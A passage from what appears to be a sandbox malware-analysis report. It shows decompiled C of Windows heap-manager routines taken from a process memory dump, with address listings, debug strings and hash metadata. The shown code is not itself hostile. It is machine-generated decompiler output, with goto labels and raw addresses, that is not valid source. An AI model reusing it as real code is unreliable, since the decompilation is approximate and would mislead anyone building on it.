                                                        						_t419[1] = 0;
                                                        						_t419[3] = 0;
                                                        						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
                                                        						 *_t419 =  *_t381;
                                                        						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
                                                        						L4:
                                                        						_t420 = _t414 +  *_t381 * 8;
                                                        						if( *(_t307 + 0x4c) == 0) {
                                                        							L6:
                                                        							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
                                                        								__eflags =  *(_t307 + 0x4c);
                                                        								if( *(_t307 + 0x4c) != 0) {
                                                        									_t390 =  *(_t307 + 0x50) ^  *_t420;
                                                        									 *_t420 = _t390;
                                                        									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
                                                        									__eflags = _t390 >> 0x18 - _t328;
                                                        									if(__eflags != 0) {
                                                        										_push(_t328);
                                                        										E0189FA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
                                                        									}
                                                        								}
                                                        								__eflags = _v5;
                                                        								if(_v5 == 0) {
                                                        									L94:
                                                        									_t382 = _t420[3];
                                                        									_t137 =  &(_t420[2]); // -16
                                                        									_t309 = _t137;
                                                        									_t186 =  *_t309;
                                                        									_v20 = _t186;
                                                        									_v16 = _t382;
                                                        									_t187 =  *((intOrPtr*)(_t186 + 4));
                                                        									__eflags =  *_t382 - _t187;
                                                        									if( *_t382 != _t187) {
                                                        										L63:
                                                        										_push(_t309);
                                                        										_push( *_t382);
                                                        										_push(_t187);
                                                        										_push(_t309);
                                                        										_push(0xd);
                                                        										L64:
                                                        										E018AA80D(_t307);
                                                        										continue;
                                                        									}
                                                        									__eflags =  *_t382 - _t309;
                                                        									if( *_t382 != _t309) {
                                                        										goto L63;
                                                        									}
                                                        									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
                                                        									_t393 =  *(_t307 + 0xb4);
                                                        									__eflags = _t393;
                                                        									if(_t393 == 0) {
                                                        										L104:
                                                        										_t330 = _v16;
                                                        										_t190 = _v20;
                                                        										 *_t330 = _t190;
                                                        										 *(_t190 + 4) = _t330;
                                                        										__eflags = _t420[0] & 0x00000008;
                                                        										if((_t420[0] & 0x00000008) == 0) {
                                                        											L107:
                                                        											_t331 = _t420[0];
                                                        											__eflags = _t331 & 0x00000004;
                                                        											if((_t331 & 0x00000004) != 0) {
                                                        												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
                                                        												_v12 = _t196;
                                                        												__eflags = _t331 & 0x00000002;
                                                        												if((_t331 & 0x00000002) != 0) {
                                                        													__eflags = _t196 - 4;
                                                        													if(_t196 > 4) {
                                                        														_t196 = _t196 - 4;
                                                        														__eflags = _t196;
                                                        														_v12 = _t196;
                                                        													}
                                                        												}
                                                        												_t162 =  &(_t420[4]); // -8
                                                        												_t197 = E0183D540(_t162, _t196, 0xfeeefeee);
                                                        												_v20 = _t197;
                                                        												__eflags = _t197 - _v12;
                                                        												if(_t197 != _v12) {
                                                        													_t335 =  *[fs:0x30];
                                                        													__eflags =  *(_t335 + 0xc);
                                                        													if( *(_t335 + 0xc) == 0) {
                                                        														_push("HEAP: ");
                                                        														E017EB150();
                                                        													} else {
                                                        														E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                        													}
                                                        													_push(_v20 + 0x10 + _t420);
                                                        													E017EB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
                                                        													_t203 =  *[fs:0x30];
                                                        													__eflags =  *((char*)(_t203 + 2));
                                                        													if( *((char*)(_t203 + 2)) != 0) {
                                                        														 *0x18d6378 = 1;
                                                        														asm("int3");
                                                        														 *0x18d6378 = 0;
                                                        													}
                                                        												}
                                                        											}
                                                        											_t394 = _a4;
                                                        											_t414[1] = 0;
                                                        											_t414[3] = 0;
                                                        											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
                                                        											 *_t414 =  *_t394;
                                                        											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
                                                        											break;
                                                        										}
                                                        										_t207 = E0180A229(_t307, _t420);
                                                        										__eflags = _t207;
                                                        										if(_t207 != 0) {
                                                        											goto L107;
                                                        										}
                                                        										E0180A309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
                                                        										continue;
                                                        									}
                                                        									_t342 =  *_t420 & 0x0000ffff;
                                                        									while(1) {
                                                        										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
                                                        										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
                                                        											break;
                                                        										}
                                                        										_t210 =  *_t393;
                                                        										__eflags = _t210;
                                                        										if(_t210 == 0) {
                                                        											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
                                                        											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
                                                        											L103:
                                                        											_t146 =  &(_t420[2]); // -16
                                                        											E0180BC04(_t307, _t393, 1, _t146, _t212, _t342);
                                                        											goto L104;
                                                        										}
                                                        										_t393 = _t210;
                                                        									}
                                                        									_t212 = _t342;
                                                        									goto L103;
                                                        								} else {
                                                        									_t384 = _t414[6];
                                                        									_t102 =  &(_t414[4]); // -16
                                                        									_t311 = _t102;
                                                        									_t215 =  *_t311;
                                                        									_v20 = _t215;
                                                        									_v16 = _t384;
                                                        									_t216 =  *((intOrPtr*)(_t215 + 4));
                                                        									__eflags =  *_t384 - _t216;
                                                        									if( *_t384 != _t216) {
                                                        										L92:
                                                        										_push(_t311);
                                                        										_push( *_t384);
                                                        										E018AA80D(_t307, 0xd, _t311, _t216);
                                                        										L93:
                                                        										_v5 = 0;
                                                        										goto L94;
                                                        									}
                                                        									__eflags =  *_t384 - _t311;
                                                        									if( *_t384 != _t311) {
                                                        										goto L92;
                                                        									}
                                                        									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
                                                        									_t386 =  *(_t307 + 0xb4);
                                                        									__eflags = _t386;
                                                        									if(_t386 == 0) {
                                                        										L79:
                                                        										_t313 = _v16;
                                                        										_t219 = _v20;
                                                        										 *_t313 = _t219;
                                                        										 *(_t219 + 4) = _t313;
                                                        										__eflags = _t414[1] & 0x00000008;
                                                        										if((_t414[1] & 0x00000008) == 0) {
                                                        											L82:
                                                        											_t314 = _t414[1];
                                                        											__eflags = _t314 & 0x00000004;
                                                        											if((_t314 & 0x00000004) != 0) {
                                                        												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
                                                        												_v12 = _t221;
                                                        												__eflags = _t314 & 0x00000002;
                                                        												if((_t314 & 0x00000002) != 0) {
                                                        													__eflags = _t221 - 4;
                                                        													if(_t221 > 4) {
                                                        														_t221 = _t221 - 4;
                                                        														__eflags = _t221;
                                                        														_v12 = _t221;
                                                        													}
                                                        												}
                                                        												_t127 =  &(_t414[8]); // -8
                                                        												_t222 = E0183D540(_t127, _t221, 0xfeeefeee);
                                                        												_v20 = _t222;
                                                        												__eflags = _t222 - _v12;
                                                        												if(_t222 != _v12) {
                                                        													_t316 =  *[fs:0x30];
                                                        													__eflags =  *(_t316 + 0xc);
                                                        													if( *(_t316 + 0xc) == 0) {
                                                        														_push("HEAP: ");
                                                        														E017EB150();
                                                        													} else {
                                                        														E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                        													}
                                                        													_push(_v20 + 0x10 + _t414);
                                                        													E017EB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
                                                        													_t228 =  *[fs:0x30];
                                                        													_t421 = _t421 + 0xc;
                                                        													__eflags =  *((char*)(_t228 + 2));
                                                        													if( *((char*)(_t228 + 2)) != 0) {
                                                        														 *0x18d6378 = 1;
                                                        														asm("int3");
                                                        														 *0x18d6378 = 0;
                                                        													}
                                                        												}
                                                        											}
                                                        											goto L93;
                                                        										}
                                                        										_t232 = E0180A229(_t307, _t414);
                                                        										__eflags = _t232;
                                                        										if(_t232 != 0) {
                                                        											goto L82;
                                                        										}
                                                        										E0180A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
                                                        										goto L93;
                                                        									}
                                                        									_t323 =  *_t414 & 0x0000ffff;
                                                        									while(1) {
                                                        										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
                                                        										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
                                                        											break;
                                                        										}
                                                        										_t235 =  *_t386;
                                                        										__eflags = _t235;
                                                        										if(_t235 == 0) {
                                                        											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
                                                        											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
                                                        											L78:
                                                        											_t111 =  &(_t414[4]); // -16
                                                        											E0180BC04(_t307, _t386, 1, _t111, _t237, _t323);
                                                        											goto L79;
                                                        										}
                                                        										_t386 = _t235;
                                                        									}
                                                        									_t237 = _t323;
                                                        									goto L78;
                                                        								}
                                                        							}
                                                        							return _t414;
                                                        						}
                                                        						_t398 =  *(_t307 + 0x50) ^  *_t420;
                                                        						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
                                                        						if(_t398 >> 0x18 != _t347) {
                                                        							_push(_t347);
                                                        							_push(0);
                                                        							_push(0);
                                                        							_push(_t420);
                                                        							_push(3);
                                                        							goto L64;
                                                        						}
                                                        						goto L6;
                                                        					} else {
                                                        						_t277 =  *_t419 & 0x0000ffff;
                                                        						_v16 = _t277;
                                                        						while(1) {
                                                        							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
                                                        							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
                                                        								break;
                                                        							}
                                                        							_t279 =  *_t404;
                                                        							__eflags = _t279;
                                                        							if(_t279 == 0) {
                                                        								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
                                                        								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
                                                        								break;
                                                        							} else {
                                                        								_t404 = _t279;
                                                        								_t277 =  *_t419 & 0x0000ffff;
                                                        								continue;
                                                        							}
                                                        						}
                                                        						E0180BC04(_t307, _t404, 1, _t350, _t277, _v16);
                                                        						goto L20;
                                                        					}
                                                        				}
                                                        			}

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                        • API String ID: 0-3178619729
                                                        • Opcode ID: 4fd8d5b02999f95bc848cd232a22949f7beabf0c28bdee21766fed6ed8628cc0
                                                        • Instruction ID: fe16fcd005d06f467f042a15b9997aefab1bdd879efd4773fa1de9a60b431d6e
                                                        • Opcode Fuzzy Hash: 4fd8d5b02999f95bc848cd232a22949f7beabf0c28bdee21766fed6ed8628cc0
                                                        • Instruction Fuzzy Hash: CD22C070A002469FEB65DF2DC898B7ABBF5EF44708F18855DE845CB286E734DA80CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 67%
                                                        			E0180B477(signed int __ecx, signed int* __edx) {
                                                        				signed int _v8;
                                                        				signed int _v12;
                                                        				intOrPtr* _v16;
                                                        				signed int* _v20;
                                                        				signed int _v24;
                                                        				char _v28;
                                                        				signed int _v44;
                                                        				char _v48;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				void* __ebp;
                                                        				signed int _t131;
                                                        				signed char _t134;
                                                        				signed int _t139;
                                                        				void* _t141;
                                                        				signed int* _t143;
                                                        				signed int* _t144;
                                                        				intOrPtr* _t147;
                                                        				char _t160;
                                                        				signed int* _t163;
                                                        				signed char* _t164;
                                                        				intOrPtr _t165;
                                                        				signed int* _t167;
                                                        				signed char* _t168;
                                                        				intOrPtr _t193;
                                                        				intOrPtr* _t195;
                                                        				signed int _t203;
                                                        				signed int _t209;
                                                        				signed int _t211;
                                                        				intOrPtr _t214;
                                                        				intOrPtr* _t231;
                                                        				intOrPtr* _t236;
                                                        				signed int _t237;
                                                        				intOrPtr* _t238;
                                                        				signed int _t240;
                                                        				intOrPtr _t241;
                                                        				char _t243;
                                                        				signed int _t252;
                                                        				signed int _t254;
                                                        				signed char _t259;
                                                        				signed int _t264;
                                                        				signed int _t268;
                                                        				intOrPtr _t277;
                                                        				unsigned int _t279;
                                                        				signed int* _t283;
                                                        				intOrPtr* _t284;
                                                        				unsigned int _t287;
                                                        				signed int _t291;
                                                        				signed int _t293;
                                                        
                                                        				_v8 =  *0x18dd360 ^ _t293;
                                                        				_t223 = __edx;
                                                        				_v20 = __edx;
                                                        				_t291 = __ecx;
                                                        				_t276 =  *__edx;
                                                        				_t231 = E0180B8E4( *__edx);
                                                        				_t292 = __ecx + 0x8c;
                                                        				_v16 = _t231;
                                                        				if(_t231 == __ecx + 0x8c) {
                                                        					L38:
                                                        					_t131 = 0;
                                                        					L34:
                                                        					return E0182B640(_t131, _t223, _v8 ^ _t293, _t276, _t291, _t292);
                                                        				}
                                                        				if( *0x18d8748 >= 1) {
                                                        					__eflags =  *((intOrPtr*)(_t231 + 0x14)) -  *__edx;
                                                        					if(__eflags < 0) {
                                                        						_t214 =  *[fs:0x30];
                                                        						__eflags =  *(_t214 + 0xc);
                                                        						if( *(_t214 + 0xc) == 0) {
                                                        							_push("HEAP: ");
                                                        							E017EB150();
                                                        						} else {
                                                        							E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                        						}
                                                        						_push("(UCRBlock->Size >= *Size)");
                                                        						E017EB150();
                                                        						__eflags =  *0x18d7bc8;
                                                        						if(__eflags == 0) {
                                                        							__eflags = 1;
                                                        							E018A2073(_t223, 1, _t291, 1);
                                                        						}
                                                        						_t231 = _v16;
                                                        					}
                                                        				}
                                                        				_t5 = _t231 - 8; // -8
                                                        				_t292 = _t5;
                                                        				_t134 =  *((intOrPtr*)(_t292 + 6));
                                                        				if(_t134 != 0) {
                                                        					_t223 = (_t292 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
                                                        				} else {
                                                        					_t223 = _t291;
                                                        				}
                                                        				_t276 = _v20;
                                                        				_v28 =  *((intOrPtr*)(_t231 + 0x10));
                                                        				_t139 =  *(_t291 + 0xcc) ^  *0x18d8a68;
                                                        				_v12 = _t139;
                                                        				if(_t139 != 0) {
                                                        					 *0x18db1e0(_t291,  &_v28, _t276);
                                                        					_t141 = _v12();
                                                        					goto L8;
                                                        				} else {
                                                        					_t203 =  *((intOrPtr*)(_t231 + 0x14));
                                                        					_v12 = _t203;
                                                        					if(_t203 -  *_t276 <=  *(_t291 + 0x6c) << 3) {
                                                        						_t264 = _v12;
                                                        						__eflags = _t264 -  *(_t291 + 0x5c) << 3;
                                                        						if(__eflags < 0) {
                                                        							 *_t276 = _t264;
                                                        						}
                                                        					}
                                                        					_t209 =  *(_t291 + 0x40) & 0x00040000;
                                                        					asm("sbb ecx, ecx");
                                                        					_t268 = ( ~_t209 & 0x0000003c) + 4;
                                                        					_v12 = _t268;
                                                        					if(_t209 != 0) {
                                                        						_push(0);
                                                        						_push(0x14);
                                                        						_push( &_v48);
                                                        						_push(3);
                                                        						_push(_t291);
                                                        						_push(0xffffffff);
                                                        						_t211 = E01829730();
                                                        						__eflags = _t211;
                                                        						if(_t211 < 0) {
                                                        							L56:
                                                        							_push(_t268);
                                                        							_t276 = _t291;
                                                        							E018AA80D(_t291, 1, _v44, 0);
                                                        							_t268 = 4;
                                                        							goto L7;
                                                        						}
                                                        						__eflags = _v44 & 0x00000060;
                                                        						if((_v44 & 0x00000060) == 0) {
                                                        							goto L56;
                                                        						}
                                                        						__eflags = _v48 - _t291;
                                                        						if(__eflags != 0) {
                                                        							goto L56;
                                                        						}
                                                        						_t268 = _v12;
                                                        					}
                                                        					L7:
                                                        					_push(_t268);
                                                        					_push(0x1000);
                                                        					_push(_v20);
                                                        					_push(0);
                                                        					_push( &_v28);
                                                        					_push(0xffffffff);
                                                        					_t141 = E01829660();
                                                        					 *((intOrPtr*)(_t291 + 0x20c)) =  *((intOrPtr*)(_t291 + 0x20c)) + 1;
                                                        					L8:
                                                        					if(_t141 < 0) {
                                                        						 *((intOrPtr*)(_t291 + 0x214)) =  *((intOrPtr*)(_t291 + 0x214)) + 1;
                                                        						goto L38;
                                                        					}
                                                        					_t143 =  *( *[fs:0x30] + 0x50);
                                                        					if(_t143 != 0) {
                                                        						__eflags =  *_t143;
                                                        						if(__eflags == 0) {
                                                        							goto L10;
                                                        						}
                                                        						_t144 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
                                                        						L11:
                                                        						if( *_t144 != 0) {
                                                        							__eflags =  *( *[fs:0x30] + 0x240) & 0x00000001;
                                                        							if(__eflags != 0) {
                                                        								E018A138A(_t223, _t291, _v28,  *_v20, 2);
                                                        							}
                                                        						}
                                                        						if( *((intOrPtr*)(_t291 + 0x4c)) != 0) {
                                                        							_t287 =  *(_t291 + 0x50) ^  *_t292;
                                                        							 *_t292 = _t287;
                                                        							_t259 = _t287 >> 0x00000010 ^ _t287 >> 0x00000008 ^ _t287;
                                                        							if(_t287 >> 0x18 != _t259) {
                                                        								_push(_t259);
                                                        								E0189FA2B(_t223, _t291, _t292, _t291, _t292, __eflags);
                                                        							}
                                                        						}
                                                        						_t147 = _v16 + 8;
                                                        						 *((char*)(_t292 + 2)) = 0;
                                                        						 *((char*)(_t292 + 7)) = 0;
                                                        						_t236 =  *((intOrPtr*)(_t147 + 4));
                                                        						_t277 =  *_t147;
                                                        						_v24 = _t236;
                                                        						_t237 =  *_t236;
                                                        						_v12 = _t237;
                                                        						_t238 = _v16;
                                                        						if(_t237 !=  *((intOrPtr*)(_t277 + 4)) || _v12 != _t147) {
                                                        							_push(_t238);
                                                        							_push(_v12);
                                                        							E018AA80D(0, 0xd, _t147,  *((intOrPtr*)(_t277 + 4)));
                                                        							_t238 = _v16;
                                                        						} else {
                                                        							_t195 = _v24;
                                                        							 *_t195 = _t277;
                                                        							 *((intOrPtr*)(_t277 + 4)) = _t195;
                                                        						}
                                                        						if( *(_t238 + 0x14) == 0) {
                                                        							L22:
                                                        							_t223[0x30] = _t223[0x30] - 1;
                                                        							_t223[0x2c] = _t223[0x2c] - ( *(_t238 + 0x14) >> 0xc);
                                                        							 *((intOrPtr*)(_t291 + 0x1e8)) =  *((intOrPtr*)(_t291 + 0x1e8)) +  *(_t238 + 0x14);
                                                        							 *((intOrPtr*)(_t291 + 0x1fc)) =  *((intOrPtr*)(_t291 + 0x1fc)) + 1;
                                                        							 *((intOrPtr*)(_t291 + 0x1f8)) =  *((intOrPtr*)(_t291 + 0x1f8)) - 1;
                                                        							_t279 =  *(_t238 + 0x14);
                                                        							if(_t279 >= 0x7f000) {
                                                        								 *((intOrPtr*)(_t291 + 0x1ec)) =  *((intOrPtr*)(_t291 + 0x1ec)) - _t279;
                                                        								_t279 =  *(_t238 + 0x14);
                                                        							}
                                                        							_t152 = _v20;
                                                        							_t240 =  *_v20;
                                                        							_v12 = _t240;
                                                        							_t241 = _v16;
                                                        							if(_t279 <= _t240) {
                                                        								__eflags =  *((intOrPtr*)(_t241 + 0x10)) + _t279 - _t223[0x28];
                                                        								if( *((intOrPtr*)(_t241 + 0x10)) + _t279 != _t223[0x28]) {
                                                        									 *_v20 = _v12 + ( *_t292 & 0x0000ffff) * 8;
                                                        									L26:
                                                        									_t243 = 0;
                                                        									 *((char*)(_t292 + 3)) = 0;
                                                        									_t276 = _t223[0x18];
                                                        									if(_t223[0x18] != _t223) {
                                                        										_t160 = (_t292 - _t223 >> 0x10) + 1;
                                                        										_v24 = _t160;
                                                        										__eflags = _t160 - 0xfe;
                                                        										if(_t160 >= 0xfe) {
                                                        											_push(0);
                                                        											_push(0);
                                                        											E018AA80D(_t276, 3, _t292, _t223);
                                                        											_t160 = _v24;
                                                        										}
                                                        										_t243 = _t160;
                                                        									}
                                                        									 *((char*)(_t292 + 6)) = _t243;
                                                        									_t163 =  *( *[fs:0x30] + 0x50);
                                                        									if(_t163 != 0) {
                                                        										__eflags =  *_t163;
                                                        										if( *_t163 == 0) {
                                                        											goto L28;
                                                        										}
                                                        										_t227 = 0x7ffe0380;
                                                        										_t164 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
                                                        										goto L29;
                                                        									} else {
                                                        										L28:
                                                        										_t227 = 0x7ffe0380;
                                                        										_t164 = 0x7ffe0380;
                                                        										L29:
                                                        										if( *_t164 != 0) {
                                                        											_t165 =  *[fs:0x30];
                                                        											__eflags =  *(_t165 + 0x240) & 0x00000001;
                                                        											if(( *(_t165 + 0x240) & 0x00000001) != 0) {
                                                        												__eflags = E01807D50();
                                                        												if(__eflags != 0) {
                                                        													_t227 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
                                                        													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x89]);
                                                        												}
                                                        												_t276 = _t292;
                                                        												E018A1582(_t227, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t227 & 0x000000ff);
                                                        											}
                                                        										}
                                                        										_t223 = 0x7ffe038a;
                                                        										_t167 =  *( *[fs:0x30] + 0x50);
                                                        										if(_t167 != 0) {
                                                        											__eflags =  *_t167;
                                                        											if( *_t167 == 0) {
                                                        												goto L31;
                                                        											}
                                                        											_t168 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
                                                        											goto L32;
                                                        										} else {
                                                        											L31:
                                                        											_t168 = _t223;
                                                        											L32:
                                                        											if( *_t168 != 0) {
                                                        												__eflags = E01807D50();
                                                        												if(__eflags != 0) {
                                                        													_t223 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
                                                        													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
                                                        												}
                                                        												_t276 = _t292;
                                                        												E018A1582(_t223, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t223 & 0x000000ff);
                                                        											}
                                                        											_t131 = _t292;
                                                        											goto L34;
                                                        										}
                                                        									}
                                                        								}
                                                        								_t152 = _v20;
                                                        							}
                                                        							E0180B73D(_t291, _t223,  *((intOrPtr*)(_t241 + 0x10)) + _v12 + 0xffffffe8, _t279 - _v12, _t292, _t152);
                                                        							 *_v20 =  *_v20 << 3;
                                                        							goto L26;
                                                        						} else {
                                                        							_t283 =  *(_t291 + 0xb8);
                                                        							if(_t283 != 0) {
                                                        								_t190 =  *(_t238 + 0x14) >> 0xc;
                                                        								while(1) {
                                                        									__eflags = _t190 - _t283[1];
                                                        									if(_t190 < _t283[1]) {
                                                        										break;
                                                        									}
                                                        									_t252 =  *_t283;
                                                        									__eflags = _t252;
                                                        									_v24 = _t252;
                                                        									_t238 = _v16;
                                                        									if(_t252 == 0) {
                                                        										_t190 = _t283[1] - 1;
                                                        										__eflags = _t283[1] - 1;
                                                        										L70:
                                                        										E0180BC04(_t291, _t283, 0, _t238, _t190,  *(_t238 + 0x14));
                                                        										_t238 = _v16;
                                                        										goto L19;
                                                        									}
                                                        									_t283 = _v24;
                                                        								}
                                                        								goto L70;
                                                        							}
                                                        							L19:
                                                        							_t193 =  *_t238;
                                                        							_t284 =  *((intOrPtr*)(_t238 + 4));
                                                        							_t254 =  *((intOrPtr*)(_t193 + 4));
                                                        							_v24 = _t254;
                                                        							_t238 = _v16;
                                                        							if( *_t284 != _t254 ||  *_t284 != _t238) {
                                                        								_push(_t238);
                                                        								_push( *_t284);
                                                        								E018AA80D(0, 0xd, _t238, _v24);
                                                        								_t238 = _v16;
                                                        							} else {
                                                        								 *_t284 = _t193;
                                                        								 *((intOrPtr*)(_t193 + 4)) = _t284;
                                                        							}
                                                        							goto L22;
                                                        						}
                                                        					}
                                                        					L10:
                                                        					_t144 = 0x7ffe0380;
                                                        					goto L11;
                                                        				}
                                                        			}


                                                        0x018529f4
                                                        0x018529fa
                                                        0x01852a01
                                                        0x00000000
                                                        0x01852a01
                                                        0x018529db
                                                        0x018529df
                                                        0x00000000
                                                        0x00000000
                                                        0x018529e1
                                                        0x018529e4
                                                        0x00000000
                                                        0x00000000
                                                        0x018529e6
                                                        0x018529e6
                                                        0x0180b51f
                                                        0x0180b51f
                                                        0x0180b520
                                                        0x0180b525
                                                        0x0180b52b
                                                        0x0180b52d
                                                        0x0180b52e
                                                        0x0180b530
                                                        0x0180b535
                                                        0x0180b53b
                                                        0x0180b53d
                                                        0x01852a07
                                                        0x00000000
                                                        0x01852a07
                                                        0x0180b549
                                                        0x0180b54e
                                                        0x01852a12
                                                        0x01852a15
                                                        0x00000000
                                                        0x00000000
                                                        0x01852a24
                                                        0x0180b559
                                                        0x0180b55c
                                                        0x01852a34
                                                        0x01852a3b
                                                        0x01852a4d
                                                        0x01852a4d
                                                        0x01852a3b
                                                        0x0180b566
                                                        0x0180b56b
                                                        0x0180b56f
                                                        0x0180b57b
                                                        0x0180b582
                                                        0x01852a57
                                                        0x01852a5c
                                                        0x01852a5c
                                                        0x0180b582
                                                        0x0180b58b
                                                        0x0180b58e
                                                        0x0180b592
                                                        0x0180b596
                                                        0x0180b599
                                                        0x0180b59b
                                                        0x0180b59e
                                                        0x0180b5a3
                                                        0x0180b5a6
                                                        0x0180b5a9
                                                        0x01852a66
                                                        0x01852a67
                                                        0x01852a73
                                                        0x01852a78
                                                        0x0180b5b8
                                                        0x0180b5b8
                                                        0x0180b5bb
                                                        0x0180b5bd
                                                        0x0180b5bd
                                                        0x0180b5c4
                                                        0x0180b5f7
                                                        0x0180b5f7
                                                        0x0180b600
                                                        0x0180b606
                                                        0x0180b60c
                                                        0x0180b612
                                                        0x0180b618
                                                        0x0180b621
                                                        0x0180b623
                                                        0x0180b629
                                                        0x0180b629
                                                        0x0180b62c
                                                        0x0180b62f
                                                        0x0180b633
                                                        0x0180b636
                                                        0x0180b639
                                                        0x0180b71d
                                                        0x0180b720
                                                        0x0180b736
                                                        0x0180b660
                                                        0x0180b660
                                                        0x0180b662
                                                        0x0180b665
                                                        0x0180b66a
                                                        0x0180b6e6
                                                        0x0180b6e7
                                                        0x0180b6ea
                                                        0x0180b6ef
                                                        0x01852ad1
                                                        0x01852ad2
                                                        0x01852ad8
                                                        0x01852add
                                                        0x01852add
                                                        0x0180b6f5
                                                        0x0180b6f5
                                                        0x0180b672
                                                        0x0180b675
                                                        0x0180b67a
                                                        0x01852ae5
                                                        0x01852ae8
                                                        0x00000000
                                                        0x00000000
                                                        0x01852af4
                                                        0x01852afc
                                                        0x00000000
                                                        0x0180b680
                                                        0x0180b680
                                                        0x0180b680
                                                        0x0180b685
                                                        0x0180b687
                                                        0x0180b68a
                                                        0x01852b06
                                                        0x01852b0c
                                                        0x01852b13
                                                        0x01852b1e
                                                        0x01852b20
                                                        0x01852b2b
                                                        0x01852b2b
                                                        0x01852b2b
                                                        0x01852b34
                                                        0x01852b45
                                                        0x01852b45
                                                        0x01852b13
                                                        0x0180b696
                                                        0x0180b69b
                                                        0x0180b6a0
                                                        0x01852b4f
                                                        0x01852b52
                                                        0x00000000
                                                        0x00000000
                                                        0x01852b61
                                                        0x00000000
                                                        0x0180b6a6
                                                        0x0180b6a6
                                                        0x0180b6a6
                                                        0x0180b6a8
                                                        0x0180b6ab
                                                        0x01852b70
                                                        0x01852b72
                                                        0x01852b7d
                                                        0x01852b7d
                                                        0x01852b7d
                                                        0x01852b86
                                                        0x01852b97
                                                        0x01852b97
                                                        0x0180b6b1
                                                        0x00000000
                                                        0x0180b6b1
                                                        0x0180b6a0
                                                        0x0180b67a
                                                        0x0180b722
                                                        0x0180b722
                                                        0x0180b655
                                                        0x0180b65d
                                                        0x00000000
                                                        0x0180b5c6
                                                        0x0180b5c6
                                                        0x0180b5ce
                                                        0x01852a83
                                                        0x01852a97
                                                        0x01852a97
                                                        0x01852a9a
                                                        0x00000000
                                                        0x00000000
                                                        0x01852a88
                                                        0x01852a8a
                                                        0x01852a8c
                                                        0x01852a8f
                                                        0x01852a92
                                                        0x01852aa1
                                                        0x01852aa1
                                                        0x01852aa2
                                                        0x01852aab
                                                        0x01852ab0
                                                        0x00000000
                                                        0x01852ab0
                                                        0x01852a94
                                                        0x01852a94
                                                        0x00000000
                                                        0x01852a9c
                                                        0x0180b5d4
                                                        0x0180b5d4
                                                        0x0180b5d6
                                                        0x0180b5d9
                                                        0x0180b5de
                                                        0x0180b5e1
                                                        0x0180b5e4
                                                        0x01852ab8
                                                        0x01852ab9
                                                        0x01852ac4
                                                        0x01852ac9
                                                        0x0180b5f2
                                                        0x0180b5f2
                                                        0x0180b5f4
                                                        0x0180b5f4
                                                        0x00000000
                                                        0x0180b5e4
                                                        0x0180b5c4
                                                        0x0180b554
                                                        0x0180b554
                                                        0x00000000
                                                        0x0180b554

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                        • API String ID: 0-4253913091
